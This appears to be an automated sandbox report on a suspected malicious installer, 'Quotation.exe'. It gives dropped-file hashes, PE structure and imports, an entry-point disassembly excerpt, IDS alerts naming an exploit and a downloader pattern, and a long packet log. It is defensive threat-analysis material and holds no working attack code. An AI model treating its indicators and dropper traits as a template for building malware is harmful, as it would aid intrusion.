                                                                                            SHA-512:2B643014E8623CADBA7CE78B91D3C751D60FCBF3FA69FA26F29A14E55679FC6A5C2074834B2496773A1756E3172EC7C898E2DF29CB4A0513DBF8BC0DCDDA7E04
                                                                                            Malicious:false
                                                                                            Preview:.......].....................................................S....................................^.4....................=.b.........................................................................o....O..................O........................t..............................I.................................................................;......................................m...................A.....................................i.........................................=...............................................................................................u..&...............................v............=................v...............p...............O.......'.............................K........................;............m......P................x.f....................K[.(..A..........#........................J..L........................i........................X................................................................................N..............f.........
                                                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):489048
                                                                                            Entropy (8bit):1.245615736901525
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:HMtjgMjMD1whyMu1IXCVAcFNpruXO+nBJH:stjgmYi03XDL+nBJ
                                                                                            MD5:B4FB425BAF217F31E91AAB39ABF66DCD
                                                                                            SHA1:03DE3BD0F923AB14213B6C4461C5CA73A0A6371C
                                                                                            SHA-256:4BC57A47B82B63EC20B393F65F3585EB81FE3F7748229CD19DEC8FE8A41D67C3
                                                                                            SHA-512:E72395FD6098130EFD543C5941781A1AA80FCE17C7701CB40FA8874271E0D43E0F7F082EBF5D458181287DE41CF4B34F88DCAABE84D8AD51003EF5DA1495D871
                                                                                            Malicious:false
                                                                                            Preview:.............9.....................A..............Z...........=.........................................................h...'.........................................................L..............................................p..C...........................,...................................p..........S............................................................................{............................................(.........C...^...........*............................U.........~................................................z.....................................A................................................]..........i.............,....................................g..............................3......K.....................u..............................................................H.t....................................................................................................................`....*.........................)1.............q..............4....
                                                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):371
                                                                                            Entropy (8bit):4.247837387326688
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:r8pLNAsEyv1WABlvMW9uu+IXvVJyQXPhXOQemtNxgFUvNwmA6AQOp2jMPA9cnb:ruJAOgABlQuTXbyKhXOLmtLgHmFOYjMV
                                                                                            MD5:46003C65AA12A0EBE55662F0141186DC
                                                                                            SHA1:739652C3375018DAFFB986302A7D3E8D32770B41
                                                                                            SHA-256:2EA079DEDE1B356842C5F5E0751B5E2B6565FDED65DAFB59A73D170C002ABB27
                                                                                            SHA-512:59D394789F9EECE97873D56AEA64F353D3E13E007E4ACBD396AC76CB68E91494EB65888049EF05CBE9B20597ADADCC960D067F90AAD3EA5AA46AC3A82F5B82FD
                                                                                            Malicious:false
                                                                                            Preview:degageredes indtgters commencing subfunctional rubiator startkatalogernes dismasted outsport..surkaalen syndedes turtledoving,leddelsestes obs jernholdigt normsammenbruds.azotite hestesko hvilkes snrkels enstatitite nappes,slangudtrykkets squills consonantising windchest interpretableness lynkrigen..vinders drikkegildet orgal snakkehjrnets responders etageejendommens..
                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Entropy (8bit):7.809660553427212
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:Quotation.exe
                                                                                            File size:1'182'800 bytes
                                                                                            MD5:816b7984251ee4c846a7f0d6160624e2
                                                                                            SHA1:be82357d711260a412103e7fde8785febd060974
                                                                                            SHA256:648ee80543d70f070c497309e4c7ce090254374da938799074de93bdaafaff5a
                                                                                            SHA512:81e035b9ffd16b8a31ab23f1d2bf621954cd42b8c0fdf0daffbac12f1964d41d949af68a06259e27bcc8163221cbfdb05f300eca7151ff901a2bcd36ca8b7a4c
                                                                                            SSDEEP:24576:G4nhDoAFAcvHumQbl7nu5v12dUC5YpdBNFQWEZNXLGQ7WczkxFnfbP9:G+hkJcvfyl7nu5vaUCMd5iNXKQKczg
                                                                                            TLSH:D945232936A5C08FEA42473C4FE7E275D93AEC143D25A11773712B8EAD72248ED9A350
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............o...o...o...k...o...i...o...n...o...n...o.I.k...o.I.....o.I.m...o.Rich..o.................PE..L...!.*c.................n.
                                                                                            Icon Hash:873335651170390f
                                                                                            Entrypoint:0x4036da
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:true
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x632AE721 [Wed Sep 21 10:27:45 2022 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:1
                                                                                            File Version Major:5
                                                                                            File Version Minor:1
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:1
                                                                                            Import Hash:3f91aceea750f765ef2ba5d9988e6a00
                                                                                            Signature Valid:false
                                                                                            Signature Issuer:CN=Bomsejlene, O=Bomsejlene, L=Cergy-Pontoise, C=FR
                                                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                            Error Number:-2146762487
                                                                                            Not Before, Not After
                                                                                            • 30/09/2024 01:05:19 30/09/2027 01:05:19
                                                                                            Subject Chain
                                                                                            • CN=Bomsejlene, O=Bomsejlene, L=Cergy-Pontoise, C=FR
                                                                                            Version:3
                                                                                            Thumbprint MD5:1606E780A7D9B9C90EE5DD9A8E3C27E3
                                                                                            Thumbprint SHA-1:73D116799E1BAD6559DFA2AAB5E863B895F9D787
                                                                                            Thumbprint SHA-256:306B7FAA9674C71EC53027C9819D39369F7D5968FA573B05221BC17B61A182BC
                                                                                            Serial:5F969FE105F61264187891D561F93FFCD4C5C2C2
                                                                                            Instruction
                                                                                            sub esp, 000003ECh
                                                                                            push ebx
                                                                                            push ebp
                                                                                            push esi
                                                                                            push edi
                                                                                            xor ebx, ebx
                                                                                            mov edi, 00408528h
                                                                                            push 00008001h
                                                                                            mov dword ptr [esp+14h], ebx
                                                                                            mov ebp, ebx
                                                                                            call dword ptr [00408170h]
                                                                                            mov esi, dword ptr [004080ACh]
                                                                                            lea eax, dword ptr [esp+2Ch]
                                                                                            xorps xmm0, xmm0
                                                                                            mov dword ptr [esp+40h], ebx
                                                                                            push eax
                                                                                            movlpd qword ptr [esp+00000144h], xmm0
                                                                                            mov dword ptr [esp+30h], 0000011Ch
                                                                                            call esi
                                                                                            test eax, eax
                                                                                            jne 00007F795170E059h
                                                                                            lea eax, dword ptr [esp+2Ch]
                                                                                            mov dword ptr [esp+2Ch], 00000114h
                                                                                            push eax
                                                                                            call esi
                                                                                            push 00000053h
                                                                                            pop eax
                                                                                            mov dl, 04h
                                                                                            mov byte ptr [esp+00000146h], dl
                                                                                            cmp word ptr [esp+40h], ax
                                                                                            jne 00007F795170E033h
                                                                                            mov eax, dword ptr [esp+5Ah]
                                                                                            add eax, FFFFFFD0h
                                                                                            mov word ptr [esp+00000140h], ax
                                                                                            jmp 00007F795170E02Dh
                                                                                            xor eax, eax
                                                                                            jmp 00007F795170E014h
                                                                                            mov dl, byte ptr [esp+00000146h]
                                                                                            cmp dword ptr [esp+30h], 0Ah
                                                                                            jnc 00007F795170E02Dh
                                                                                            movzx eax, word ptr [esp+38h]
                                                                                            mov dword ptr [esp+38h], eax
                                                                                            jmp 00007F795170E026h
                                                                                            mov eax, dword ptr [esp+38h]
                                                                                            mov dword ptr [007A8638h], eax
                                                                                            movzx eax, byte ptr [esp+30h]
                                                                                            shl ax, 0008h
                                                                                            movzx ecx, ax
                                                                                            movzx eax, byte ptr [esp+34h]
                                                                                            or ecx, eax
                                                                                            movzx eax, byte ptr [esp+00000140h]
                                                                                            shl ax, 0008h
                                                                                            shl ecx, 10h
                                                                                            movzx eax, word ptr [eax]
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8a000xa0.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3db0000x3e910.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x11fa280x1228.data
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x6c0b0x6e009178309eee1a86dc5ef945d6826a6897False0.6605823863636363data6.398414552532143IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x80000x18960x1a000885e83a553c38819d1fab2908ca0cf5False0.4307391826923077data4.86610208699674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0xa0000x39e6400x2005c0f03a1a77f205400c2cbabec9976c4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .ndata0x3a90000x320000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x3db0000x3e9100x3ea002690c3c0c1de505f961321c7e2d6da34False0.6915076097804391data6.574790239627466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_ICON0x3db3880x16482PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000394451383867
                                                                                            RT_ICON0x3f18100x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.486498876138649
                                                                                            RT_ICON0x4020380x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.5308492747529956
                                                                                            RT_ICON0x40b4e00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.5497227356746766
                                                                                            RT_ICON0x4109680x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.5415682569674067
                                                                                            RT_ICON0x414b900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5884854771784233
                                                                                            RT_ICON0x4171380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6179643527204502
                                                                                            RT_ICON0x4181e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6668032786885246
                                                                                            RT_ICON0x418b680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7287234042553191
                                                                                            RT_DIALOG0x418fd00x100dataEnglishUnited States0.5234375
                                                                                            RT_DIALOG0x4190d00x11cdataEnglishUnited States0.6056338028169014
                                                                                            RT_DIALOG0x4191f00xc4dataEnglishUnited States0.5918367346938775
                                                                                            RT_DIALOG0x4192b80x60dataEnglishUnited States0.7291666666666666
                                                                                            RT_GROUP_ICON0x4193180x84Targa image data - Map 32 x 25730 x 1 +1EnglishUnited States0.7348484848484849
                                                                                            RT_VERSION0x4193a00x220dataEnglishUnited States0.5110294117647058
                                                                                            RT_MANIFEST0x4195c00x349XML 1.0 document, ASCII text, with very long lines (841), with no line terminatorsEnglishUnited States0.5529131985731273
                                                                                            DLLImport
                                                                                            ADVAPI32.dllRegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
                                                                                            SHELL32.dllShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
                                                                                            ole32.dllOleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
                                                                                            COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                                            USER32.dllDispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
                                                                                            GDI32.dllSetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
                                                                                            KERNEL32.dllWriteFile, GetLastError, WaitForSingleObject, GetExitCodeProcess, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, RemoveDirectoryW, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode
                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States
                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-11-05T15:07:22.327002+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.749736TCP
                                                                                            2024-11-05T15:07:50.887278+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.749919TCP
                                                                                            2024-11-05T15:07:54.512032+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749936172.217.18.14443TCP
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 5, 2024 15:07:53.134684086 CET49936443192.168.2.7172.217.18.14
                                                                                            Nov 5, 2024 15:07:53.134722948 CET44349936172.217.18.14192.168.2.7
                                                                                            Nov 5, 2024 15:07:53.134836912 CET49936443192.168.2.7172.217.18.14
                                                                                            Nov 5, 2024 15:07:53.199800968 CET49936443192.168.2.7172.217.18.14
                                                                                            Nov 5, 2024 15:07:53.199811935 CET44349936172.217.18.14192.168.2.7
                                                                                            Nov 5, 2024 15:07:54.061402082 CET44349936172.217.18.14192.168.2.7
                                                                                            Nov 5, 2024 15:07:54.061516047 CET49936443192.168.2.7172.217.18.14
                                                                                            Nov 5, 2024 15:07:54.062212944 CET44349936172.217.18.14192.168.2.7
                                                                                            Nov 5, 2024 15:07:54.062293053 CET49936443192.168.2.7172.217.18.14
                                                                                            Nov 5, 2024 15:07:54.138250113 CET49936443192.168.2.7172.217.18.14
                                                                                            Nov 5, 2024 15:07:54.138262987 CET44349936172.217.18.14192.168.2.7
                                                                                            Nov 5, 2024 15:07:54.138628960 CET44349936172.217.18.14192.168.2.7
                                                                                            Nov 5, 2024 15:07:54.138709068 CET49936443192.168.2.7172.217.18.14
                                                                                            Nov 5, 2024 15:07:54.143412113 CET49936443192.168.2.7172.217.18.14
                                                                                            Nov 5, 2024 15:07:54.187339067 CET44349936172.217.18.14192.168.2.7
                                                                                            Nov 5, 2024 15:07:54.512025118 CET44349936172.217.18.14192.168.2.7
                                                                                            Nov 5, 2024 15:07:54.514234066 CET49936443192.168.2.7172.217.18.14
                                                                                            Nov 5, 2024 15:07:54.514254093 CET44349936172.217.18.14192.168.2.7
                                                                                            Nov 5, 2024 15:07:54.514337063 CET49936443192.168.2.7172.217.18.14
                                                                                            Nov 5, 2024 15:07:54.514518976 CET49936443192.168.2.7172.217.18.14
                                                                                            Nov 5, 2024 15:07:54.514570951 CET44349936172.217.18.14192.168.2.7
                                                                                            Nov 5, 2024 15:07:54.514750957 CET44349936172.217.18.14192.168.2.7
                                                                                            Nov 5, 2024 15:07:54.514815092 CET49936443192.168.2.7172.217.18.14
                                                                                            Nov 5, 2024 15:07:54.514841080 CET49936443192.168.2.7172.217.18.14
                                                                                            Nov 5, 2024 15:07:54.556313992 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:54.556358099 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:54.556493044 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:54.556803942 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:54.556817055 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:55.420203924 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:55.420324087 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:55.491025925 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:55.491056919 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:55.492074013 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:55.494168043 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:55.494656086 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:55.535336971 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.136370897 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.136580944 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.143626928 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.143815041 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.257028103 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.257107973 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.257124901 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.257169008 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.257302046 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.257349014 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.257353067 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.257394075 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.257632017 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.257692099 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.257963896 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.258014917 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.263079882 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.263143063 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.263149023 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.263186932 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.272162914 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.272218943 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.272244930 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.272296906 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.375890970 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.375957966 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.375963926 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.375978947 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.375998974 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.376017094 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.376033068 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.376038074 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.376059055 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.376081944 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.376085997 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.376120090 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.381073952 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.381149054 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.385819912 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.385869026 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.390845060 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.390898943 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.390903950 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.390942097 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.390944958 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.390979052 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.493927002 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.494019032 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.494467974 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.494525909 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.494596958 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.494647980 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.494713068 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.494766951 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.494815111 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.494867086 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.494895935 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.494949102 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.505669117 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.505740881 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.506254911 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.506311893 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.509478092 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.509557009 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.509567976 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.509622097 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.509663105 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.509721994 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.612909079 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.612977028 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.613019943 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.613070011 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.613100052 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.613154888 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.613178968 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.613235950 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.613301039 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.613346100 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.613377094 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.613429070 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.613454103 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.613503933 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.613548994 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.613599062 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.623460054 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.623521090 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.623814106 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.623866081 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.627506971 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.627561092 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.627624989 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.627681971 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.676012039 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.676096916 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.676131010 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.676171064 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.731431961 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.731532097 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.731559992 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.731637001 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.731647968 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.731698990 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.731842041 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.731884956 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.732026100 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.732070923 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.742604017 CET44349947142.250.184.225192.168.2.7
                                                                                            Nov 5, 2024 15:07:58.742666960 CET49947443192.168.2.7142.250.184.225
                                                                                            Nov 5, 2024 15:07:58.742712021 CET44349947142.250.184.225192.168.2.7
